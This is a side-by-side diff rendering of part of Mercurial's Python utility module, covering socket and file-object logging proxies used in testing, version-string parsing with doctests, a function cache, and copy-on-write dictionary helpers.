565 ``bufferedinputpipe`` aware of these operations.
567 ``bufferedinputpipe`` aware of these operations.
566
568
567 This variation of ``bufferedinputpipe`` can notify observers about
569 This variation of ``bufferedinputpipe`` can notify observers about
568 ``os.read()`` events. It also re-publishes other events, such as
570 ``os.read()`` events. It also re-publishes other events, such as
569 ``read()`` and ``readline()``.
571 ``read()`` and ``readline()``.
570 """
572 """
571 def _fillbuffer(self):
573 def _fillbuffer(self):
572 res = super(observedbufferedinputpipe, self)._fillbuffer()
574 res = super(observedbufferedinputpipe, self)._fillbuffer()
573
575
574 fn = getattr(self._input._observer, r'osread', None)
576 fn = getattr(self._input._observer, r'osread', None)
575 if fn:
577 if fn:
576 fn(res, _chunksize)
578 fn(res, _chunksize)
577
579
578 return res
580 return res
579
581
580 # We use different observer methods because the operation isn't
582 # We use different observer methods because the operation isn't
581 # performed on the actual file object but on us.
583 # performed on the actual file object but on us.
582 def read(self, size):
584 def read(self, size):
583 res = super(observedbufferedinputpipe, self).read(size)
585 res = super(observedbufferedinputpipe, self).read(size)
584
586
585 fn = getattr(self._input._observer, r'bufferedread', None)
587 fn = getattr(self._input._observer, r'bufferedread', None)
586 if fn:
588 if fn:
587 fn(res, size)
589 fn(res, size)
588
590
589 return res
591 return res
590
592
591 def readline(self, *args, **kwargs):
593 def readline(self, *args, **kwargs):
592 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
594 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
593
595
594 fn = getattr(self._input._observer, r'bufferedreadline', None)
596 fn = getattr(self._input._observer, r'bufferedreadline', None)
595 if fn:
597 if fn:
596 fn(res)
598 fn(res)
597
599
598 return res
600 return res
599
601
600 PROXIED_SOCKET_METHODS = {
602 PROXIED_SOCKET_METHODS = {
601 r'makefile',
603 r'makefile',
602 r'recv',
604 r'recv',
603 r'recvfrom',
605 r'recvfrom',
604 r'recvfrom_into',
606 r'recvfrom_into',
605 r'recv_into',
607 r'recv_into',
606 r'send',
608 r'send',
607 r'sendall',
609 r'sendall',
608 r'sendto',
610 r'sendto',
609 r'setblocking',
611 r'setblocking',
610 r'settimeout',
612 r'settimeout',
611 r'gettimeout',
613 r'gettimeout',
612 r'setsockopt',
614 r'setsockopt',
613 }
615 }
614
616
615 class socketproxy(object):
617 class socketproxy(object):
616 """A proxy around a socket that tells a watcher when events occur.
618 """A proxy around a socket that tells a watcher when events occur.
617
619
618 This is like ``fileobjectproxy`` except for sockets.
620 This is like ``fileobjectproxy`` except for sockets.
619
621
620 This type is intended to only be used for testing purposes. Think hard
622 This type is intended to only be used for testing purposes. Think hard
621 before using it in important code.
623 before using it in important code.
622 """
624 """
623 __slots__ = (
625 __slots__ = (
624 r'_orig',
626 r'_orig',
625 r'_observer',
627 r'_observer',
626 )
628 )
627
629
628 def __init__(self, sock, observer):
630 def __init__(self, sock, observer):
629 object.__setattr__(self, r'_orig', sock)
631 object.__setattr__(self, r'_orig', sock)
630 object.__setattr__(self, r'_observer', observer)
632 object.__setattr__(self, r'_observer', observer)
631
633
632 def __getattribute__(self, name):
634 def __getattribute__(self, name):
633 if name in PROXIED_SOCKET_METHODS:
635 if name in PROXIED_SOCKET_METHODS:
634 return object.__getattribute__(self, name)
636 return object.__getattribute__(self, name)
635
637
636 return getattr(object.__getattribute__(self, r'_orig'), name)
638 return getattr(object.__getattribute__(self, r'_orig'), name)
637
639
638 def __delattr__(self, name):
640 def __delattr__(self, name):
639 return delattr(object.__getattribute__(self, r'_orig'), name)
641 return delattr(object.__getattribute__(self, r'_orig'), name)
640
642
641 def __setattr__(self, name, value):
643 def __setattr__(self, name, value):
642 return setattr(object.__getattribute__(self, r'_orig'), name, value)
644 return setattr(object.__getattribute__(self, r'_orig'), name, value)
643
645
644 def __nonzero__(self):
646 def __nonzero__(self):
645 return bool(object.__getattribute__(self, r'_orig'))
647 return bool(object.__getattribute__(self, r'_orig'))
646
648
647 __bool__ = __nonzero__
649 __bool__ = __nonzero__
648
650
649 def _observedcall(self, name, *args, **kwargs):
651 def _observedcall(self, name, *args, **kwargs):
650 # Call the original object.
652 # Call the original object.
651 orig = object.__getattribute__(self, r'_orig')
653 orig = object.__getattribute__(self, r'_orig')
652 res = getattr(orig, name)(*args, **kwargs)
654 res = getattr(orig, name)(*args, **kwargs)
653
655
654 # Call a method on the observer of the same name with arguments
656 # Call a method on the observer of the same name with arguments
655 # so it can react, log, etc.
657 # so it can react, log, etc.
656 observer = object.__getattribute__(self, r'_observer')
658 observer = object.__getattribute__(self, r'_observer')
657 fn = getattr(observer, name, None)
659 fn = getattr(observer, name, None)
658 if fn:
660 if fn:
659 fn(res, *args, **kwargs)
661 fn(res, *args, **kwargs)
660
662
661 return res
663 return res
662
664
663 def makefile(self, *args, **kwargs):
665 def makefile(self, *args, **kwargs):
664 res = object.__getattribute__(self, r'_observedcall')(
666 res = object.__getattribute__(self, r'_observedcall')(
665 r'makefile', *args, **kwargs)
667 r'makefile', *args, **kwargs)
666
668
667 # The file object may be used for I/O. So we turn it into a
669 # The file object may be used for I/O. So we turn it into a
668 # proxy using our observer.
670 # proxy using our observer.
669 observer = object.__getattribute__(self, r'_observer')
671 observer = object.__getattribute__(self, r'_observer')
670 return makeloggingfileobject(observer.fh, res, observer.name,
672 return makeloggingfileobject(observer.fh, res, observer.name,
671 reads=observer.reads,
673 reads=observer.reads,
672 writes=observer.writes,
674 writes=observer.writes,
673 logdata=observer.logdata,
675 logdata=observer.logdata,
674 logdataapis=observer.logdataapis)
676 logdataapis=observer.logdataapis)
675
677
676 def recv(self, *args, **kwargs):
678 def recv(self, *args, **kwargs):
677 return object.__getattribute__(self, r'_observedcall')(
679 return object.__getattribute__(self, r'_observedcall')(
678 r'recv', *args, **kwargs)
680 r'recv', *args, **kwargs)
679
681
680 def recvfrom(self, *args, **kwargs):
682 def recvfrom(self, *args, **kwargs):
681 return object.__getattribute__(self, r'_observedcall')(
683 return object.__getattribute__(self, r'_observedcall')(
682 r'recvfrom', *args, **kwargs)
684 r'recvfrom', *args, **kwargs)
683
685
684 def recvfrom_into(self, *args, **kwargs):
686 def recvfrom_into(self, *args, **kwargs):
685 return object.__getattribute__(self, r'_observedcall')(
687 return object.__getattribute__(self, r'_observedcall')(
686 r'recvfrom_into', *args, **kwargs)
688 r'recvfrom_into', *args, **kwargs)
687
689
688 def recv_into(self, *args, **kwargs):
690 def recv_into(self, *args, **kwargs):
689 return object.__getattribute__(self, r'_observedcall')(
691 return object.__getattribute__(self, r'_observedcall')(
690 r'recv_info', *args, **kwargs)
692 r'recv_info', *args, **kwargs)
691
693
692 def send(self, *args, **kwargs):
694 def send(self, *args, **kwargs):
693 return object.__getattribute__(self, r'_observedcall')(
695 return object.__getattribute__(self, r'_observedcall')(
694 r'send', *args, **kwargs)
696 r'send', *args, **kwargs)
695
697
696 def sendall(self, *args, **kwargs):
698 def sendall(self, *args, **kwargs):
697 return object.__getattribute__(self, r'_observedcall')(
699 return object.__getattribute__(self, r'_observedcall')(
698 r'sendall', *args, **kwargs)
700 r'sendall', *args, **kwargs)
699
701
700 def sendto(self, *args, **kwargs):
702 def sendto(self, *args, **kwargs):
701 return object.__getattribute__(self, r'_observedcall')(
703 return object.__getattribute__(self, r'_observedcall')(
702 r'sendto', *args, **kwargs)
704 r'sendto', *args, **kwargs)
703
705
704 def setblocking(self, *args, **kwargs):
706 def setblocking(self, *args, **kwargs):
705 return object.__getattribute__(self, r'_observedcall')(
707 return object.__getattribute__(self, r'_observedcall')(
706 r'setblocking', *args, **kwargs)
708 r'setblocking', *args, **kwargs)
707
709
708 def settimeout(self, *args, **kwargs):
710 def settimeout(self, *args, **kwargs):
709 return object.__getattribute__(self, r'_observedcall')(
711 return object.__getattribute__(self, r'_observedcall')(
710 r'settimeout', *args, **kwargs)
712 r'settimeout', *args, **kwargs)
711
713
712 def gettimeout(self, *args, **kwargs):
714 def gettimeout(self, *args, **kwargs):
713 return object.__getattribute__(self, r'_observedcall')(
715 return object.__getattribute__(self, r'_observedcall')(
714 r'gettimeout', *args, **kwargs)
716 r'gettimeout', *args, **kwargs)
715
717
716 def setsockopt(self, *args, **kwargs):
718 def setsockopt(self, *args, **kwargs):
717 return object.__getattribute__(self, r'_observedcall')(
719 return object.__getattribute__(self, r'_observedcall')(
718 r'setsockopt', *args, **kwargs)
720 r'setsockopt', *args, **kwargs)
719
721
720 class baseproxyobserver(object):
722 class baseproxyobserver(object):
721 def _writedata(self, data):
723 def _writedata(self, data):
722 if not self.logdata:
724 if not self.logdata:
723 if self.logdataapis:
725 if self.logdataapis:
724 self.fh.write('\n')
726 self.fh.write('\n')
725 self.fh.flush()
727 self.fh.flush()
726 return
728 return
727
729
728 # Simple case writes all data on a single line.
730 # Simple case writes all data on a single line.
729 if b'\n' not in data:
731 if b'\n' not in data:
730 if self.logdataapis:
732 if self.logdataapis:
731 self.fh.write(': %s\n' % stringutil.escapestr(data))
733 self.fh.write(': %s\n' % stringutil.escapestr(data))
732 else:
734 else:
733 self.fh.write('%s> %s\n'
735 self.fh.write('%s> %s\n'
734 % (self.name, stringutil.escapestr(data)))
736 % (self.name, stringutil.escapestr(data)))
735 self.fh.flush()
737 self.fh.flush()
736 return
738 return
737
739
738 # Data with newlines is written to multiple lines.
740 # Data with newlines is written to multiple lines.
739 if self.logdataapis:
741 if self.logdataapis:
740 self.fh.write(':\n')
742 self.fh.write(':\n')
741
743
742 lines = data.splitlines(True)
744 lines = data.splitlines(True)
743 for line in lines:
745 for line in lines:
744 self.fh.write('%s> %s\n'
746 self.fh.write('%s> %s\n'
745 % (self.name, stringutil.escapestr(line)))
747 % (self.name, stringutil.escapestr(line)))
746 self.fh.flush()
748 self.fh.flush()
747
749
748 class fileobjectobserver(baseproxyobserver):
750 class fileobjectobserver(baseproxyobserver):
749 """Logs file object activity."""
751 """Logs file object activity."""
750 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
752 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
751 logdataapis=True):
753 logdataapis=True):
752 self.fh = fh
754 self.fh = fh
753 self.name = name
755 self.name = name
754 self.logdata = logdata
756 self.logdata = logdata
755 self.logdataapis = logdataapis
757 self.logdataapis = logdataapis
756 self.reads = reads
758 self.reads = reads
757 self.writes = writes
759 self.writes = writes
758
760
759 def read(self, res, size=-1):
761 def read(self, res, size=-1):
760 if not self.reads:
762 if not self.reads:
761 return
763 return
762 # Python 3 can return None from reads at EOF instead of empty strings.
764 # Python 3 can return None from reads at EOF instead of empty strings.
763 if res is None:
765 if res is None:
764 res = ''
766 res = ''
765
767
766 if size == -1 and res == '':
768 if size == -1 and res == '':
767 # Suppress pointless read(-1) calls that return
769 # Suppress pointless read(-1) calls that return
768 # nothing. These happen _a lot_ on Python 3, and there
770 # nothing. These happen _a lot_ on Python 3, and there
769 # doesn't seem to be a better workaround to have matching
771 # doesn't seem to be a better workaround to have matching
770 # Python 2 and 3 behavior. :(
772 # Python 2 and 3 behavior. :(
771 return
773 return
772
774
773 if self.logdataapis:
775 if self.logdataapis:
774 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
776 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
775
777
776 self._writedata(res)
778 self._writedata(res)
777
779
778 def readline(self, res, limit=-1):
780 def readline(self, res, limit=-1):
779 if not self.reads:
781 if not self.reads:
780 return
782 return
781
783
782 if self.logdataapis:
784 if self.logdataapis:
783 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
785 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
784
786
785 self._writedata(res)
787 self._writedata(res)
786
788
787 def readinto(self, res, dest):
789 def readinto(self, res, dest):
788 if not self.reads:
790 if not self.reads:
789 return
791 return
790
792
791 if self.logdataapis:
793 if self.logdataapis:
792 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
794 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
793 res))
795 res))
794
796
795 data = dest[0:res] if res is not None else b''
797 data = dest[0:res] if res is not None else b''
796
798
797 # _writedata() uses "in" operator and is confused by memoryview because
799 # _writedata() uses "in" operator and is confused by memoryview because
798 # characters are ints on Python 3.
800 # characters are ints on Python 3.
799 if isinstance(data, memoryview):
801 if isinstance(data, memoryview):
800 data = data.tobytes()
802 data = data.tobytes()
801
803
802 self._writedata(data)
804 self._writedata(data)
803
805
804 def write(self, res, data):
806 def write(self, res, data):
805 if not self.writes:
807 if not self.writes:
806 return
808 return
807
809
808 # Python 2 returns None from some write() calls. Python 3 (reasonably)
810 # Python 2 returns None from some write() calls. Python 3 (reasonably)
809 # returns the integer bytes written.
811 # returns the integer bytes written.
810 if res is None and data:
812 if res is None and data:
811 res = len(data)
813 res = len(data)
812
814
813 if self.logdataapis:
815 if self.logdataapis:
814 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
816 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
815
817
816 self._writedata(data)
818 self._writedata(data)
817
819
818 def flush(self, res):
820 def flush(self, res):
819 if not self.writes:
821 if not self.writes:
820 return
822 return
821
823
822 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
824 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
823
825
824 # For observedbufferedinputpipe.
826 # For observedbufferedinputpipe.
825 def bufferedread(self, res, size):
827 def bufferedread(self, res, size):
826 if not self.reads:
828 if not self.reads:
827 return
829 return
828
830
829 if self.logdataapis:
831 if self.logdataapis:
830 self.fh.write('%s> bufferedread(%d) -> %d' % (
832 self.fh.write('%s> bufferedread(%d) -> %d' % (
831 self.name, size, len(res)))
833 self.name, size, len(res)))
832
834
833 self._writedata(res)
835 self._writedata(res)
834
836
835 def bufferedreadline(self, res):
837 def bufferedreadline(self, res):
836 if not self.reads:
838 if not self.reads:
837 return
839 return
838
840
839 if self.logdataapis:
841 if self.logdataapis:
840 self.fh.write('%s> bufferedreadline() -> %d' % (
842 self.fh.write('%s> bufferedreadline() -> %d' % (
841 self.name, len(res)))
843 self.name, len(res)))
842
844
843 self._writedata(res)
845 self._writedata(res)
844
846
845 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
847 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
846 logdata=False, logdataapis=True):
848 logdata=False, logdataapis=True):
847 """Turn a file object into a logging file object."""
849 """Turn a file object into a logging file object."""
848
850
849 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
851 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
850 logdata=logdata, logdataapis=logdataapis)
852 logdata=logdata, logdataapis=logdataapis)
851 return fileobjectproxy(fh, observer)
853 return fileobjectproxy(fh, observer)
852
854
853 class socketobserver(baseproxyobserver):
855 class socketobserver(baseproxyobserver):
854 """Logs socket activity."""
856 """Logs socket activity."""
855 def __init__(self, fh, name, reads=True, writes=True, states=True,
857 def __init__(self, fh, name, reads=True, writes=True, states=True,
856 logdata=False, logdataapis=True):
858 logdata=False, logdataapis=True):
857 self.fh = fh
859 self.fh = fh
858 self.name = name
860 self.name = name
859 self.reads = reads
861 self.reads = reads
860 self.writes = writes
862 self.writes = writes
861 self.states = states
863 self.states = states
862 self.logdata = logdata
864 self.logdata = logdata
863 self.logdataapis = logdataapis
865 self.logdataapis = logdataapis
864
866
865 def makefile(self, res, mode=None, bufsize=None):
867 def makefile(self, res, mode=None, bufsize=None):
866 if not self.states:
868 if not self.states:
867 return
869 return
868
870
869 self.fh.write('%s> makefile(%r, %r)\n' % (
871 self.fh.write('%s> makefile(%r, %r)\n' % (
870 self.name, mode, bufsize))
872 self.name, mode, bufsize))
871
873
872 def recv(self, res, size, flags=0):
874 def recv(self, res, size, flags=0):
873 if not self.reads:
875 if not self.reads:
874 return
876 return
875
877
876 if self.logdataapis:
878 if self.logdataapis:
877 self.fh.write('%s> recv(%d, %d) -> %d' % (
879 self.fh.write('%s> recv(%d, %d) -> %d' % (
878 self.name, size, flags, len(res)))
880 self.name, size, flags, len(res)))
879 self._writedata(res)
881 self._writedata(res)
880
882
881 def recvfrom(self, res, size, flags=0):
883 def recvfrom(self, res, size, flags=0):
882 if not self.reads:
884 if not self.reads:
883 return
885 return
884
886
885 if self.logdataapis:
887 if self.logdataapis:
886 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
888 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
887 self.name, size, flags, len(res[0])))
889 self.name, size, flags, len(res[0])))
888
890
889 self._writedata(res[0])
891 self._writedata(res[0])
890
892
891 def recvfrom_into(self, res, buf, size, flags=0):
893 def recvfrom_into(self, res, buf, size, flags=0):
892 if not self.reads:
894 if not self.reads:
893 return
895 return
894
896
895 if self.logdataapis:
897 if self.logdataapis:
896 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
898 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
897 self.name, size, flags, res[0]))
899 self.name, size, flags, res[0]))
898
900
899 self._writedata(buf[0:res[0]])
901 self._writedata(buf[0:res[0]])
900
902
901 def recv_into(self, res, buf, size=0, flags=0):
903 def recv_into(self, res, buf, size=0, flags=0):
902 if not self.reads:
904 if not self.reads:
903 return
905 return
904
906
905 if self.logdataapis:
907 if self.logdataapis:
906 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
908 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
907 self.name, size, flags, res))
909 self.name, size, flags, res))
908
910
909 self._writedata(buf[0:res])
911 self._writedata(buf[0:res])
910
912
911 def send(self, res, data, flags=0):
913 def send(self, res, data, flags=0):
912 if not self.writes:
914 if not self.writes:
913 return
915 return
914
916
915 self.fh.write('%s> send(%d, %d) -> %d' % (
917 self.fh.write('%s> send(%d, %d) -> %d' % (
916 self.name, len(data), flags, len(res)))
918 self.name, len(data), flags, len(res)))
917 self._writedata(data)
919 self._writedata(data)
918
920
919 def sendall(self, res, data, flags=0):
921 def sendall(self, res, data, flags=0):
920 if not self.writes:
922 if not self.writes:
921 return
923 return
922
924
923 if self.logdataapis:
925 if self.logdataapis:
924 # Returns None on success. So don't bother reporting return value.
926 # Returns None on success. So don't bother reporting return value.
925 self.fh.write('%s> sendall(%d, %d)' % (
927 self.fh.write('%s> sendall(%d, %d)' % (
926 self.name, len(data), flags))
928 self.name, len(data), flags))
927
929
928 self._writedata(data)
930 self._writedata(data)
929
931
930 def sendto(self, res, data, flagsoraddress, address=None):
932 def sendto(self, res, data, flagsoraddress, address=None):
931 if not self.writes:
933 if not self.writes:
932 return
934 return
933
935
934 if address:
936 if address:
935 flags = flagsoraddress
937 flags = flagsoraddress
936 else:
938 else:
937 flags = 0
939 flags = 0
938
940
939 if self.logdataapis:
941 if self.logdataapis:
940 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
942 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
941 self.name, len(data), flags, address, res))
943 self.name, len(data), flags, address, res))
942
944
943 self._writedata(data)
945 self._writedata(data)
944
946
945 def setblocking(self, res, flag):
947 def setblocking(self, res, flag):
946 if not self.states:
948 if not self.states:
947 return
949 return
948
950
949 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
951 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
950
952
951 def settimeout(self, res, value):
953 def settimeout(self, res, value):
952 if not self.states:
954 if not self.states:
953 return
955 return
954
956
955 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
957 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
956
958
957 def gettimeout(self, res):
959 def gettimeout(self, res):
958 if not self.states:
960 if not self.states:
959 return
961 return
960
962
961 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
963 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
962
964
963 def setsockopt(self, res, level, optname, value):
965 def setsockopt(self, res, level, optname, value):
964 if not self.states:
966 if not self.states:
965 return
967 return
966
968
967 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
969 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
968 self.name, level, optname, value, res))
970 self.name, level, optname, value, res))
969
971
970 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
972 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
971 logdata=False, logdataapis=True):
973 logdata=False, logdataapis=True):
972 """Turn a socket into a logging socket."""
974 """Turn a socket into a logging socket."""
973
975
974 observer = socketobserver(logh, name, reads=reads, writes=writes,
976 observer = socketobserver(logh, name, reads=reads, writes=writes,
975 states=states, logdata=logdata,
977 states=states, logdata=logdata,
976 logdataapis=logdataapis)
978 logdataapis=logdataapis)
977 return socketproxy(fh, observer)
979 return socketproxy(fh, observer)
978
980
979 def version():
981 def version():
980 """Return version information if available."""
982 """Return version information if available."""
981 try:
983 try:
982 from . import __version__
984 from . import __version__
983 return __version__.version
985 return __version__.version
984 except ImportError:
986 except ImportError:
985 return 'unknown'
987 return 'unknown'
986
988
987 def versiontuple(v=None, n=4):
989 def versiontuple(v=None, n=4):
988 """Parses a Mercurial version string into an N-tuple.
990 """Parses a Mercurial version string into an N-tuple.
989
991
990 The version string to be parsed is specified with the ``v`` argument.
992 The version string to be parsed is specified with the ``v`` argument.
991 If it isn't defined, the current Mercurial version string will be parsed.
993 If it isn't defined, the current Mercurial version string will be parsed.
992
994
993 ``n`` can be 2, 3, or 4. Here is how some version strings map to
995 ``n`` can be 2, 3, or 4. Here is how some version strings map to
994 returned values:
996 returned values:
995
997
996 >>> v = b'3.6.1+190-df9b73d2d444'
998 >>> v = b'3.6.1+190-df9b73d2d444'
997 >>> versiontuple(v, 2)
999 >>> versiontuple(v, 2)
998 (3, 6)
1000 (3, 6)
999 >>> versiontuple(v, 3)
1001 >>> versiontuple(v, 3)
1000 (3, 6, 1)
1002 (3, 6, 1)
1001 >>> versiontuple(v, 4)
1003 >>> versiontuple(v, 4)
1002 (3, 6, 1, '190-df9b73d2d444')
1004 (3, 6, 1, '190-df9b73d2d444')
1003
1005
1004 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1006 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1005 (3, 6, 1, '190-df9b73d2d444+20151118')
1007 (3, 6, 1, '190-df9b73d2d444+20151118')
1006
1008
1007 >>> v = b'3.6'
1009 >>> v = b'3.6'
1008 >>> versiontuple(v, 2)
1010 >>> versiontuple(v, 2)
1009 (3, 6)
1011 (3, 6)
1010 >>> versiontuple(v, 3)
1012 >>> versiontuple(v, 3)
1011 (3, 6, None)
1013 (3, 6, None)
1012 >>> versiontuple(v, 4)
1014 >>> versiontuple(v, 4)
1013 (3, 6, None, None)
1015 (3, 6, None, None)
1014
1016
1015 >>> v = b'3.9-rc'
1017 >>> v = b'3.9-rc'
1016 >>> versiontuple(v, 2)
1018 >>> versiontuple(v, 2)
1017 (3, 9)
1019 (3, 9)
1018 >>> versiontuple(v, 3)
1020 >>> versiontuple(v, 3)
1019 (3, 9, None)
1021 (3, 9, None)
1020 >>> versiontuple(v, 4)
1022 >>> versiontuple(v, 4)
1021 (3, 9, None, 'rc')
1023 (3, 9, None, 'rc')
1022
1024
1023 >>> v = b'3.9-rc+2-02a8fea4289b'
1025 >>> v = b'3.9-rc+2-02a8fea4289b'
1024 >>> versiontuple(v, 2)
1026 >>> versiontuple(v, 2)
1025 (3, 9)
1027 (3, 9)
1026 >>> versiontuple(v, 3)
1028 >>> versiontuple(v, 3)
1027 (3, 9, None)
1029 (3, 9, None)
1028 >>> versiontuple(v, 4)
1030 >>> versiontuple(v, 4)
1029 (3, 9, None, 'rc+2-02a8fea4289b')
1031 (3, 9, None, 'rc+2-02a8fea4289b')
1030
1032
1031 >>> versiontuple(b'4.6rc0')
1033 >>> versiontuple(b'4.6rc0')
1032 (4, 6, None, 'rc0')
1034 (4, 6, None, 'rc0')
1033 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1035 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1034 (4, 6, None, 'rc0+12-425d55e54f98')
1036 (4, 6, None, 'rc0+12-425d55e54f98')
1035 >>> versiontuple(b'.1.2.3')
1037 >>> versiontuple(b'.1.2.3')
1036 (None, None, None, '.1.2.3')
1038 (None, None, None, '.1.2.3')
1037 >>> versiontuple(b'12.34..5')
1039 >>> versiontuple(b'12.34..5')
1038 (12, 34, None, '..5')
1040 (12, 34, None, '..5')
1039 >>> versiontuple(b'1.2.3.4.5.6')
1041 >>> versiontuple(b'1.2.3.4.5.6')
1040 (1, 2, 3, '.4.5.6')
1042 (1, 2, 3, '.4.5.6')
1041 """
1043 """
1042 if not v:
1044 if not v:
1043 v = version()
1045 v = version()
1044 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1046 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1045 if not m:
1047 if not m:
1046 vparts, extra = '', v
1048 vparts, extra = '', v
1047 elif m.group(2):
1049 elif m.group(2):
1048 vparts, extra = m.groups()
1050 vparts, extra = m.groups()
1049 else:
1051 else:
1050 vparts, extra = m.group(1), None
1052 vparts, extra = m.group(1), None
1051
1053
1052 vints = []
1054 vints = []
1053 for i in vparts.split('.'):
1055 for i in vparts.split('.'):
1054 try:
1056 try:
1055 vints.append(int(i))
1057 vints.append(int(i))
1056 except ValueError:
1058 except ValueError:
1057 break
1059 break
1058 # (3, 6) -> (3, 6, None)
1060 # (3, 6) -> (3, 6, None)
1059 while len(vints) < 3:
1061 while len(vints) < 3:
1060 vints.append(None)
1062 vints.append(None)
1061
1063
1062 if n == 2:
1064 if n == 2:
1063 return (vints[0], vints[1])
1065 return (vints[0], vints[1])
1064 if n == 3:
1066 if n == 3:
1065 return (vints[0], vints[1], vints[2])
1067 return (vints[0], vints[1], vints[2])
1066 if n == 4:
1068 if n == 4:
1067 return (vints[0], vints[1], vints[2], extra)
1069 return (vints[0], vints[1], vints[2], extra)
1068
1070
1069 def cachefunc(func):
1071 def cachefunc(func):
1070 '''cache the result of function calls'''
1072 '''cache the result of function calls'''
1071 # XXX doesn't handle keywords args
1073 # XXX doesn't handle keywords args
1072 if func.__code__.co_argcount == 0:
1074 if func.__code__.co_argcount == 0:
1073 cache = []
1075 cache = []
1074 def f():
1076 def f():
1075 if len(cache) == 0:
1077 if len(cache) == 0:
1076 cache.append(func())
1078 cache.append(func())
1077 return cache[0]
1079 return cache[0]
1078 return f
1080 return f
1079 cache = {}
1081 cache = {}
1080 if func.__code__.co_argcount == 1:
1082 if func.__code__.co_argcount == 1:
1081 # we gain a small amount of time because
1083 # we gain a small amount of time because
1082 # we don't need to pack/unpack the list
1084 # we don't need to pack/unpack the list
1083 def f(arg):
1085 def f(arg):
1084 if arg not in cache:
1086 if arg not in cache:
1085 cache[arg] = func(arg)
1087 cache[arg] = func(arg)
1086 return cache[arg]
1088 return cache[arg]
1087 else:
1089 else:
1088 def f(*args):
1090 def f(*args):
1089 if args not in cache:
1091 if args not in cache:
1090 cache[args] = func(*args)
1092 cache[args] = func(*args)
1091 return cache[args]
1093 return cache[args]
1092
1094
1093 return f
1095 return f
1094
1096
1095 class cow(object):
1097 class cow(object):
1096 """helper class to make copy-on-write easier
1098 """helper class to make copy-on-write easier
1097
1099
1098 Call preparewrite before doing any writes.
1100 Call preparewrite before doing any writes.
1099 """
1101 """
1100
1102
1101 def preparewrite(self):
1103 def preparewrite(self):
1102 """call this before writes, return self or a copied new object"""
1104 """call this before writes, return self or a copied new object"""
1103 if getattr(self, '_copied', 0):
1105 if getattr(self, '_copied', 0):
1104 self._copied -= 1
1106 self._copied -= 1
1105 return self.__class__(self)
1107 return self.__class__(self)
1106 return self
1108 return self
1107
1109
1108 def copy(self):
1110 def copy(self):
1109 """always do a cheap copy"""
1111 """always do a cheap copy"""
1110 self._copied = getattr(self, '_copied', 0) + 1
1112 self._copied = getattr(self, '_copied', 0) + 1
1111 return self
1113 return self
1112
1114
1113 class sortdict(collections.OrderedDict):
1115 class sortdict(collections.OrderedDict):
1114 '''a simple sorted dictionary
1116 '''a simple sorted dictionary
1115
1117
1116 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1118 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1117 >>> d2 = d1.copy()
1119 >>> d2 = d1.copy()
1118 >>> d2
1120 >>> d2
1119 sortdict([('a', 0), ('b', 1)])
1121 sortdict([('a', 0), ('b', 1)])
1120 >>> d2.update([(b'a', 2)])
1122 >>> d2.update([(b'a', 2)])
1121 >>> list(d2.keys()) # should still be in last-set order
1123 >>> list(d2.keys()) # should still be in last-set order
1122 ['b', 'a']
1124 ['b', 'a']
1123 '''
1125 '''
1124
1126
1125 def __setitem__(self, key, value):
1127 def __setitem__(self, key, value):
1126 if key in self:
1128 if key in self:
1127 del self[key]
1129 del self[key]
1128 super(sortdict, self).__setitem__(key, value)
1130 super(sortdict, self).__setitem__(key, value)
1129
1131
1130 if pycompat.ispypy:
1132 if pycompat.ispypy:
1131 # __setitem__() isn't called as of PyPy 5.8.0
1133 # __setitem__() isn't called as of PyPy 5.8.0
1132 def update(self, src):
1134 def update(self, src):
1133 if isinstance(src, dict):
1135 if isinstance(src, dict):
1134 src = src.iteritems()
1136 src = src.iteritems()
1135 for k, v in src:
1137 for k, v in src:
1136 self[k] = v
1138 self[k] = v
1137
1139
1138 class cowdict(cow, dict):
1140 class cowdict(cow, dict):
1139 """copy-on-write dict
1141 """copy-on-write dict
1140
1142
1141 Be sure to call d = d.preparewrite() before writing to d.
1143 Be sure to call d = d.preparewrite() before writing to d.
1142
1144
1143 >>> a = cowdict()
1145 >>> a = cowdict()
1144 >>> a is a.preparewrite()
1146 >>> a is a.preparewrite()
1145 True
1147 True
1146 >>> b = a.copy()
1148 >>> b = a.copy()
